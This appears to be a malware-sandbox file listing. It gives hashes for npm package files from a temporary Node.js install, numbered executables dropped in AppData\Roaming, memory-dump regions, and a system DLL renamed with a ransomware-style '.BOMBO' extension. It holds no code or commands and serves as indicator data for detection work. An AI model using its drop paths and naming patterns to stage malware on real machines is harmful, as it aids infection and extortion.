SHA1 8ef7f95a46766ff6e33d56e5091183ee3a1b1eea
SHA256 00fd7780ba199a984bbc1f35875017ae26fb8e48ef6e3e4b11fcf0954478e0fb
SHA512 c2ba9ba55784e4a89cfcd644232654a32bb43c20f7a916d69ef4e65f9b88810813432531e3812a93f4686ab103676976a6deb78f39f3380350107991938b4a6a

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\.travis.yml

MD5 f11e385dcfb8387981201298f1f67716
SHA1 9271796a1d21e59d1a2db06447adbae7441e76cf
SHA256 8021d98e405a58cd51b76bf2669b071be7815db2c68216403c1ca02989c1ec2e
SHA512 fdcae76ecedb4a3306763cca3359c9be2b6d30a88a37c5527c1c4e9f64c53abb0c1369af05dc7e420437476f9f050c999492d31117e3a1c312bd17b35740efd5

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable.js

MD5 fcb52503b2a3fd35d025cde5a6782d15
SHA1 2e47c9e030510f202245566f0fbf4e209f938bad
SHA256 0b99c6a91a40658c75ec7ad8671f02304e93b07bd412e49540b9655f2090e557
SHA512 3b522c95217ca6517197a82d4752d14471c305becb0cb4a516746c4e985e911e07fecd02f3a6e0e9aaef306ab8689a34c05701db1794ad5769bbc760a1353c46

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable-browser.js

MD5 817cf252e6005ac5ab0970dd15b05174
SHA1 ac035836aeb22cb1627b8630eba14e2ea4d7f653
SHA256 0d92b48420b6f4ead3c22d6f9db562a232e502e54ca283122fb383828f7b3842
SHA512 8fd9b47fa3dd8c5dae9e65cb98f65f8e69da84a4b152026bd28cc50d1be48590ca9d0c9ce2a2b9b27af318a54204233df36a005442050e922e9450192409d0a7

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\transform.js

MD5 1c9d3713bbc3dbe2142da7921ab0cad4
SHA1 4b1b8e22ca2572e5d5808e4b432d7599352c2282
SHA256 62707b41fa0e51f0556a32f98c7306fa7ff2e76d65df0a614889b827c3f5eaab
SHA512 e582281b62eb5ac45ae039a90f81e97c3c1e81a65caf1c09e355dd2eae05760f254058c5d83dac953271dd8b90ebdb8b1748a10388a23386a9a7e089294a4efd

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\README.md

MD5 f13ecdad6c52fe7ee74b98217316764a
SHA1 c3d7c4bec741e70452f0da911a71307c77d91500
SHA256 42294293978532e3523e7b09172e9da9cc1c0d1bd5d04baf4b9b984ed2088d0d
SHA512 f6664185183bf970c7450e79be5707ea43119dab621583bd61f7080a8b0292845e8f7450836408371dd3ea12ce766af75413464d7082a445e0c29cffe7ff8c75

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable.js

MD5 76a193a4bca414ffd6baed6e73a3e105
SHA1 4dbf5e4e8a7223c0f3adf7a0ca8c28bc678292a0
SHA256 cdeb57ca548c8dcf28f9546f202763f9b03e555046476d213d571c6cb7a59a43
SHA512 f30abcb6532c81e6dc3ac10ca408a32df89e0af72cdceabbbf0efecab38bdc5dae6c65f6cf861eb2e9f0ea6c20f1abb24a64989003a0fff16778b7ad2f24fa66

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\readable-browser.js

MD5 dd3f26ae7d763c35d17344a993d5eeb5
SHA1 020ce7510107d1cd16fd15e8abef18fd8dee9316
SHA256 d9c3473b418fbf6103aa34c716fa9d8df7ad1cf5900dac48301dc3e8ea6139ae
SHA512 65103f629bc2c7a36e804e01ad05c7fe4ae8239adad8e7965c6559be20f2c38fe30d4729de950478d4a2184c88f9f9ccba5d0b459742ac33a99f0abb37e42400

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\passthrough.js

MD5 622c2df3803df1939b1ee25912db4454
SHA1 83be571f59074a357bf8fe50b90c4ad21412bd43
SHA256 cfbb763646dda37e1434a5ebc4691fca75b0694b8d89505420ba3d7d489241e6
SHA512 09a74ea5daac0d11883ae003b228784588244c1f4501e5eb41ffcc957c32587d3458e0ada1e56b47c983808fe5f9b8265dcede5a88c6642a5716a1f9a39432ee

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\LICENSE

MD5 d816ace3e00e1e8e105d6b978375f83d
SHA1 31045917a8be9b631ffb5b3148884997b87bd11a
SHA256 b7cd4c543903a138ba70beef889be606adceefa1359f858670d52d1865127e24
SHA512 82c9105602008647c8381bf4996742441fb1c98f5dd91dc85fa0d166686cb1294c47ba18b93da25ee46adf5135a29ab3d0dcadd0a50c6d1e32b5d401b9ca0f9d

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_writable.js

MD5 31f2f1a4a92b8e950faa990566d9410b
SHA1 3b3f157c3ae828417dd955498f9d065f5b00b538
SHA256 7262ec523f9247b6a75f5e10c5db82e08cfe65acc49f9c96fcb67f68c5a41435
SHA512 c604bb3465ae2e2dea8c8977796a15b76657db0d791d0d67ccf727ad4dd9209efc2fd5ca4a7e15d8931c50d786273d0ae9eadd0c6c5778cac309cb6a81f10a4e

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_transform.js

MD5 54be917915eb32ae9b4a71c7cc1b3246
SHA1 82a2a3af2ac3e43475ab0e09e6652f4042e12c57
SHA256 75aabc0acf662f0cfa187ea79437b1ca4edac342b6995fe6038d171e719d3613
SHA512 40312c18fea85f62a09e55366230847cb5c7f30535cb123b13f9fc71468278076b325958cc138c57c7958c97a3e98f5500c9da4bc4b1b3edf8aa0519d1e4b955

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_readable.js

MD5 7bca08c5eeade583afb53df46a92c42b
SHA1 ccc5caa24181f96a1dd2dd9244265c6db848d3f7
SHA256 46ca457378727959f5d2214955c03de665a22c644ddb78c568e925f725ed7e84
SHA512 0ef7813e335cbf06e8963cca10b24a28363284446f0f7bcee7751111e6eb098df6ff286ac6ae9b0f312d11e117e69d19b8d96f47d6566568212b7a5d6eb085b7

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream.js

MD5 a391c874badff581abab66c04c4e2e50
SHA1 7b868ed96844e06b284dbc84e3e9db868915203c
SHA256 783e5e798a19dde6981db840cad5a2bfbf0822dd2819fe14c54a1f4e71f0d363
SHA512 cb9ef0ef02515f0a9c6c57fed7e5ed6c9c36cfbe80ad1d4d2554a63e8a4ea106d5b04376a587fe10dca6101474e5890623517bd68558a63d33e0c3569ee62866

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\stream-browser.js

MD5 46b005ecbd876040c07864736861135f
SHA1 c4229c3c10949c67a6cbc9d4c57d3cc1c848edb3
SHA256 0406c41a3dc088c309a3efb822e145bb78856668bd60d16b66b637f4dbf2a1ba
SHA512 533d688ca138bca4610f7a03a80d79ff88d922fda4a230504d698d45ee1c6e4a609f1eeaf8cb073866e9d91963adececc8d00412e85b37706bcca3957c265803

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\destroy.js

MD5 a4607210c0c5e058d5897a6f22ac0a6c
SHA1 11c94e733b2230731ee3cd30c2c081090ffa6835
SHA256 713e5bac5e10b8d0940eda803835c50da6ef1373f1e7b872b063373069129377
SHA512 86e2223c3da2eda2c4fedc2e162bb91fef0c8b6ab0e0f1136b73c8c992f736e6e5d330f2352acbf43b02b9a4d26a8a8ae06c642135ab70b82364dce3e2903871

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\internal\streams\BufferList.js

MD5 99511811073f43563c50a7e7458d200b
SHA1 b131b41c8aa9ae0bfce1b0004525771710bc70a4
SHA256 b404455762369e9df0542e909dbda88df308d53f6abbac0b8f8c0b727e848a74
SHA512 79b64079ef2cc931fb7c333a3438a48b9b0f41aa61087fe2850b050a9d1537a9d410eab3a27d49f1b994ff8e949c488d0f9a8f7f9b1503c1c32b49cca81e85a5

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\GOVERNANCE.md

MD5 b5cdc063fe6b17a632d6108eefec147e
SHA1 ffc13a639880de3c122d467aabb670209cc9542c
SHA256 7366d24a6cd0b904b2a34b7a4c8a8f62fc855605ed0ab4030cbee5a9304f94e7
SHA512 7ff8dab3bb67b5685335b657fcb0b901851ffbd49f25773543e34fd31c81ae19ef62386f06a5e9881428cbfbe29d7ca041558178d73f4f1cbc31cbcc7eaac388

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex.js

MD5 1a2977043a90c2169b60a5991599fc2a
SHA1 27c20fc801b9851e37341ec9730d0fbc9c333593
SHA256 8c1a1af19eaf01f960e9dc5fc35fbcb0e84060d748883866e002b708231b46ac
SHA512 5f233cf6dd4a82365c130daf1902f9deacf7a76999caf01ad8de9308097bb9dd6d9795836419dfbc07e50055915404c720dc1bb5aa28a463ca1117f52c81b614

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\duplex-browser.js

MD5 276ae60048c10d30d8463ac907c2fcec
SHA1 be247923f7e56c9f40905f48dc03c87f0aeb4363
SHA256 bf30af3ba075b80a9eaf05ba5e4e3e331e8a9b304ccb10b7c156aa8075f92f44
SHA512 e3f8c1a038aaf84f0c6b94e2c7fc646844754cc3d951683784182bd90bacc56e0c2f0f1a4be16ea2e5218f44d0f7f6ad00dcec72eb4c0e6eeb4176535587e890

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\gentle-fs\node_modules\iferr\.npmignore

MD5 2e5243fbad9b5b60464b4e0e54e3f30b
SHA1 d644bb560260a56300db7836367d90ac02b0d17c
SHA256 cd429484a9e55b1df61764740f7153c476037c791b9dabac344bcce552a45080
SHA512 a540facc5bcc4eb5bb082bc3b3ce76a3275ebd284ffa1c210ab6e993d5c868c748b2248cb921a3fe449930cb2f16e18120409000e1f916d4abdfd72b77a5799f

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\is-symbol\Makefile

MD5 b8bbbc01d4cbf61a2a5d764e2395d7c9
SHA1 48fa21aa52875191aa2ab21156bb5a20aed49014
SHA256 4586074dc6c5129837eb6cde39a21fc30e251c498e9fcc8fc0c8076a3af97e86
SHA512 ac8ceb376dbc14addca0f63b787ed24989608911fca520ab7ce88a01f0c639cf24e9f3a0bb75e972886a46b1c5715342532817d0bebb6e339d21857b0f1da3d1

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmteam\.travis.yml

MD5 f51eed7ed699afb51054b11328ea78cf
SHA1 8b68fb74f59a6288ad5c71aee221f7e86c169532
SHA256 fa37bf69fa66e3475a1d499059ff372be0e136e41923c8d6fb407f649a4cb472
SHA512 f7a4ef776fa2e53f46f0b032f0359555422e8729c855b0822cae8f464e49e7f9a453514ce08ec4e5d7a3d02909e40e6771d7bffa1f54ed6f0d2f6ebaeb59b02b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpx\LICENSE.md

MD5 e9dc66f98e5f7ff720bf603fff36ebc5
SHA1 f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256 b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA512 8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmteam\appveyor.yml

MD5 c75fff3c7388fd6119578b9d76a598be
SHA1 3b4a13ed37307d560b8b4b631f4debacc7b0d19c
SHA256 8c9537e3c45610f99f3869f6b40a1bfc7c0ae82f72534e9ed0730cd9deb2a4bd
SHA512 9c7d033d70dd8cd360cc5df12bc7bc911fe4c7b626fb1353c3dd6e42d0583f7c0c7f33b3668a90e52dd0c5b4efc87c219005e91513854a98e18138119fd2b0a2

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmsearch\PULL_REQUEST_TEMPLATE

MD5 06128b3583815726dcdcc40e31855b0d
SHA1 c93f36d2cd32221f94561f1daac62be9ccfb0bc9
SHA256 0d2e3b0d2c6a52197998a5e9345dbb7622e5a8542dcd1ed7d76a5101293d00f0
SHA512 c7babf81f0206223f0da838285871e0ea145c6335575b19d60a52eecaa13f9b6e635bd294a62c8f09d9f52236127ee721814118817775d03a656e67537ebfbec

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\libnpmsearch\LICENSE

MD5 072ac9ab0c4667f8f876becedfe10ee0
SHA1 0227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA256 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512 f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

memory/928-2434-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\lodash._baseuniq\LICENSE

MD5 a3a97c2bfdbd1edeb3e95ee9e7769d91
SHA1 3e5fd8699e3990171456a49bba9e154125fd5da1
SHA256 3e0f669f0550e6101efcc81d9032af5498b72eec499df58cfbf63e24a61e2f75
SHA512 7c7d273148f0f3b2e64e16d0164140540a5a02dcb1574a7ec3a53c0ee5acd88810a68e65ea80fd26c1896abab6d65c2b3e738423d44f226cdba1b3dc784512fe

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\lodash._getnative\LICENSE

MD5 26c80e27b277fdd0678be3bd6cd56931
SHA1 148865ccd32e961df8aedd4859840eac4130364a
SHA256 34c9e87365128252851b101ae194a31e3d019724b20c25fa66fd4521a326c818
SHA512 b727fcfb6d09d74fc344f361a5f19e7e679166c5c5bc0666c66fc7599908b3c4aa24f4e4da18948a41ade67d23a908ac27b564b4261ab890a543d8aadb4fc3be

C:\Users\Admin\AppData\Roaming\4.dll

MD5 986d769a639a877a9b8f4fb3c8616911
SHA1 ba1cc29d845d958bd60c989eaa36fdaf9db7ea41
SHA256 c94374155dded12d9f90d16f03470b12b14c4df109a9cf8dbf26e9cd66850457
SHA512 3a1e2a6b57278071906ee2d7b1f9ca6d1ed98084c80512da854e5c1f73e480b92f2b1cceccf87523184bf34250e3cb6a0e1172d7f5478777570f807820d9a187

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\README.md

MD5 675a05085e7944bc9724a063bc4ed622
SHA1 e1ec3510f824203542cac07fd2052375472a3937
SHA256 da325e3fe4425fc89c9a474ae18eea542f5787151c92bb2aba9dc99de596cfa1
SHA512 a9512b09f95cc79594f29590468197d4deb53fcfc03fd13f3a5b864ca57a5fec6c62879ce32699547ac1d2aae0bbb4d681484e7236d5a804093c788e33d67a61

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\move-concurrently\node_modules\aproba\LICENSE

MD5 9ea8c9dc7d5714c61dfdaedcc774fb69
SHA1 5ea7b44b36946359b3200e48de240fe957ee70f1
SHA256 1b94c9898885c681c1e0ebbf96494e49662842f88ac1e4dd8ffad0ac047108ae
SHA512 0401c416464818fcaadd6e156ce92c28448e990765ddb7d0097b0c30ea9c8a5d862a53a94fd4a0adb502db1e3abe445c08f18e6fcccbb9f70fcbab273a938e60

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\mkdirp\node_modules\minimist\LICENSE

MD5 a6df4eaa6c6a1471228755d06f2494cf
SHA1 b7d2d5450231d817d31b687103065ac090e955ab
SHA256 a9ecf3da3825b3e7232f29c970a2869bb1752c900bd75ba7cbabeb69b8f032b4
SHA512 340a980d3cbe1fae476b27dce893a707b40d8db4c35a3d5cb0e8a907bb8792e06dc50f23ce4abd50a35f18fa74e20caf92e142de4100fb2c5a5e58d5152800b9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\npm-bundled\LICENSE

MD5 1d7c74bcd1904d125f6aff37749dc069
SHA1 21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab
SHA256 24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9
SHA512 b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\LICENSE

MD5 e495b6c03f6259077e712e7951ade052
SHA1 784d6e3e026405191cc3878fa6f34cb17f040a4d
SHA256 5836b658b3a29bfc790f472bf6b5a5dfdf08789285c2a50dd43901d5733691db
SHA512 26f124b803587bd76ac1084ccb759a8a82841d2122fa7be671413434df532e4c7c43442d06a4626f134f96a091eb6d09146bcad731c4053552f4079fd5708a63

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\object.getownpropertydescriptors\.editorconfig

MD5 db5ae3e08230f6c6a164bc3747f9863e
SHA1 c02bb3a95537ea2a0ba2f0d3a34fb19e57154399
SHA256 2dc461c2ca14c593ed13101958988e6e5d6944144bb3f8f70631eb96365e9f1e
SHA512 ffd68aaec13ad5910dd5f1c17c7a062d06fffc09db7ab31627fcfd223fa99ec7544103db98e2462b9f2b769984b1dfe1e787dec2814ab1daf465a75320c53a3c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\pump\LICENSE

MD5 713e86b5fbba64b71263283717ef2b31
SHA1 a96c5d4c7e9d43da53e1a48703e761876453b76c
SHA256 c222d7cd6879fb81d79a019383a6f651107d76f1f75b2632c438828b1a08c227
SHA512 64e4d6383e531446ab4851103f49621fc787c6f506e417e55ab2c1ddb66e3abc3d69edd717f6269169211bf52b632bebe29daa6925b10d3b6fd8d07aa0f87c5f

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\run-queue\node_modules\aproba\index.js

MD5 d7adafc3f75d89eb31609f0c88a16e69
SHA1 974e1ed33c1ea7b016a61b95fed7eccadcf93521
SHA256 8059de4e00e45bad48e09ae5eec5476740b2462fbd913dcc0a055dfa73dd533a
SHA512 b534aa9e922e26448a9c592b98111572074ce50768f8dedd8f1c1449652b8e20997138259ec14bafcc0cba0afaa2e4aab21c6e73c84107472ab946c3ea16d7b9

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\slide\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\tunnel-agent\LICENSE

MD5 781a14a7d5369a78091214c3a50d7de5
SHA1 2dfab247089b0288ffa87c64b296bf520461cb35
SHA256 c3613146372a1d5b88c5215439f22f2ba271c1f6284133bbea37887b078fd5de
SHA512 ce5173d8ebe3d455d204e7471a86c80a98c31c94e632a2c367f342e46942f554beba8729f7fe21e968a0710b4c2d00e5af6fd53306bbef12e93ee66682d709ba

C:\Users\Admin\AppData\Roaming\14.exe

MD5 9acd34bcff86e2c01bf5e6675f013b17
SHA1 59bc42d62fbd99dd0f17dec175ea6c2a168f217a
SHA256 384fef8417014b298dca5ae9e16226348bda61198065973537f4907ac2aa1a60
SHA512 9de65becdfc9aaab9710651376684ee697015f3a8d3695a5664535d9dfc34f2343ce4209549cbf09080a0b527e78a253f19169d9c6eb6e4d4a03d1b31ded8933

C:\Users\Admin\AppData\Roaming\13.exe

MD5 349f49be2b024c5f7232f77f3acd4ff6
SHA1 515721802486abd76f29ee6ed5b4481579ab88e5
SHA256 262d38348a745517600abe0719345c6d17c8705dd3b4d67e7a545a94b9388b60
SHA512 a6c9a96c7738f6408c28b1579009167136ce9d3d68deb4c02f57324d800bce284f5d63a9d589651e8ab37b2ac17bf94e9bd59c63aaa3b66f0891e55ba7d646a0

C:\Users\Admin\AppData\Roaming\15.exe

MD5 d43d9558d37cdac1690fdeec0af1b38d
SHA1 98e6dfdd79f43f0971c0eaa58f18bce0e8cbf555
SHA256 501c921311164470ca8cb02e66146d8e3f36baa54bfc3ecb3a1a0ed3186ecbc5
SHA512 9a357c1bbc153ddc017da08c691730a47ab0ff50834cdc69540ede093d17d432789586d8074a4a8816fb1928a511f2a899362bb03feab16ca231adfdc0004aca

C:\Users\Admin\AppData\Roaming\16.exe

MD5 56ba37144bd63d39f23d25dae471054e
SHA1 088e2aff607981dfe5249ce58121ceae0d1db577
SHA256 307077d1a3fd2b53b94d88268e31b0b89b8c0c2ee9dbb46041d3e2395243f1b3
SHA512 6e086bea3389412f6a9fa11e2caa2887db5128c2ad1030685e6841d7d199b63c6d9a76fb9d1ed9116afd851485501843f72af8366537a8283de2f9ab7f3d56f0

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-C13A8C73.[[email protected]].BOMBO

MD5 dcfc14553c40a428e9e2437090e3c170
SHA1 20ca93badd8b2fd69e4d8ee06b79405584e945e1
SHA256 f47dd2857e3f94e7c4e66db044583b3de23eccb912e341c38a00193ae02c06a9
SHA512 4041d68334372093706f9dadb8f15184324ef2b71dc8f0984c466574b11e281e684d774385e45e62149ae4d2772d49b68e729ff6a3d15ffdaf2e09136c8c84b5

C:\Users\Admin\AppData\Roaming\17.exe

MD5 15a05615d617394afc0231fc47444394
SHA1 d1253f7c5b10e7a46e084329c36f7692b41c6d59
SHA256 596566f6cb70d55b1b0978a0fab4cffd5049559545fe7ee2fa3897ccbc46c013
SHA512 6deea7c0c3795de7360b11fa04384e0956520a3a7bf5405d411b58487a35bba51eaca51c1e2dda910d4159c22179a9161d84da52193e376dfdf6bdfbe8e9f0f1

C:\Users\Admin\AppData\Roaming\18.exe

MD5 bf15960dd7174427df765fd9f9203521
SHA1 cb1de1df0c3b1a1cc70a28629ac51d67901b17aa
SHA256 9187706072f008a27c26421791f57ec33a59b44b012500b2db3eeb48136fb2da
SHA512 7e8b9907233234440135f27ad813db97e20790baf8cb92949ae9185fa09cb4b7b0da35b6da2b33f3ac64a33545f32f959d90d73f7a6a4f14988c8ac3fd005074

memory/6352-6159-0x00000000002A0000-0x000000000030E000-memory.dmp

memory/6352-6160-0x0000000004BC0000-0x0000000004C12000-memory.dmp

memory/6352-6161-0x0000000004B70000-0x0000000004BB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\19.exe

MD5 ff96cd537ecded6e76c83b0da2a6d03c
SHA1 ec05b49da2f8d74b95560602b39db3943de414cb
SHA256 7897571671717742304acde430e5959c09fd9c29fbbe808105f00a1f663927ac
SHA512 24a827fda9db76c030852ef2db73c6b75913c9ee55e130a3c9a7c6ff7aff0fb7192ff1c47cd266b91500a04657b2da61a5fc00e48e7fbc27a6cbc9b7d91daa4b

C:\Users\Admin\AppData\Roaming\20.exe

MD5 ddcdc714bedffb59133570c3a2b7913f
SHA1 d21953fa497a541f185ed87553a7c24ffc8a67ce
SHA256 be3e6008dde30cb959b90a332a79931b889216a9483944dc5c0d958dec1b8e46
SHA512 a1d728751490c6cf21f9597c6df6f8db857c28d224b2d03e6d25ce8f17557accbd8ef2972369337b9d3305d5b9029001e5300825c23ce826884dcee55b37562c

C:\Users\Admin\AppData\Roaming\21.exe

MD5 9a7f746e51775ca001efd6ecd6ca57ea
SHA1 7ea50de8dd8c82a7673b97bb7ccd665d98de2300
SHA256 c4c308629a06c9a4af93fbd747ed2421e2ff2460347352366e51b91d19737400
SHA512 20cd6af47a92b396ae565e0a21d3acaa0d3a74bcdccc1506a55dea891da912b03256ba9900c2c089fe44d71210e3c100ba4601cf4d6c9b492a2ce0d323d4c57f

C:\Users\Admin\AppData\Roaming\22.exe

MD5 48e9df7a479e3fd63064ec66e2283a45
SHA1 a8dcce44de655a97a3448758b397a37d1f7db549
SHA256 c7d8c3c379dcc42fa796b07b6a9155826d39cbd2f264bc68d22a63b17c8ef7df
SHA512 6cc839f118cad9982ec998665b409dc297a8cff9b23ec2a9105d15cf58d9adbf46d0048dda76c8e1574f6288d901912b7de373920b68b53dbda43d6075611016

memory/10448-17134-0x00000000002A0000-0x0000000000424000-memory.dmp

memory/10448-17807-0x0000000004D10000-0x0000000004D16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpF6F3.tmp

MD5 2aa8900e91131f181c04da07de96d3fd
SHA1 919a93896f50cf1bf0c482c76b4dc1019eab0955
SHA256 8bada7f1857292effa7f25f0ef5eb8d5ab74b02874e9decf025b945ab034591c
SHA512 92cf2eb20e8ffde9d2f1add28eb5a79d5a3ed14e8953be0c5be41259077aee24c380e18e80e194b22ff8f0013aee2319b03d888af38996351b215cb46344973e

C:\Users\Admin\AppData\Roaming\23.exe

MD5 0dca3348a8b579a1bfa93b4f5b25cddd
SHA1 1ee1bcfd80cd7713093f9c053ef2d8c2cd673cd7
SHA256 c430a15c1712a571b0cd3ed0e5dfeefa7e78865a91bdc12e66666cd37c0e9654
SHA512 f0a17a940dd1c956f2578ed852e94631a9762fdd825ed5160b3758e427e8efa2ff0bfc83f239976b1d2765fefc8f9182e41c2da8f5746b36d4b7d189cb14a1b8

memory/10448-19966-0x0000000004E40000-0x0000000004FDA000-memory.dmp

C:\Users\Admin\AppData\Roaming\24.exe

MD5 43728c30a355702a47c8189c08f84661
SHA1 790873601f3d12522873f86ca1a87bf922f83205
SHA256 cecdf155db1d228bc153ebe762d7970bd6a64e81cf5f977343f906a1e1d56e44
SHA512 b2d0882d5392007364e5f605c405b98a375e34dec63be5d16d9fae374313336fa13edbb6b8894334afb409833ffc0dbbc9be3d7b4263bdf5b77dbff9f2182e1e

memory/10448-20195-0x0000000005070000-0x0000000005076000-memory.dmp

memory/10448-20407-0x0000000005410000-0x0000000005476000-memory.dmp

memory/8728-20800-0x0000000000E20000-0x0000000000E8A000-memory.dmp

memory/7480-21505-0x0000000000400000-0x0000000000452000-memory.dmp

memory/8728-23665-0x00000000085C0000-0x0000000008618000-memory.dmp

memory/9152-25047-0x0000000000790000-0x0000000000828000-memory.dmp

memory/7480-28439-0x00000000058D0000-0x00000000058E8000-memory.dmp

memory/12336-29752-0x0000000000400000-0x0000000000452000-memory.dmp

memory/6676-30180-0x0000000004DB0000-0x0000000004DD2000-memory.dmp

memory/9152-30349-0x0000000002AB0000-0x0000000002B12000-memory.dmp

memory/9152-31822-0x0000000006A00000-0x0000000006A56000-memory.dmp

memory/7916-37210-0x0000000000400000-0x0000000000452000-memory.dmp

C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logrv.ini

MD5 bbc41c78bae6c71e63cb544a6a284d94
SHA1 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a
SHA256 ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb
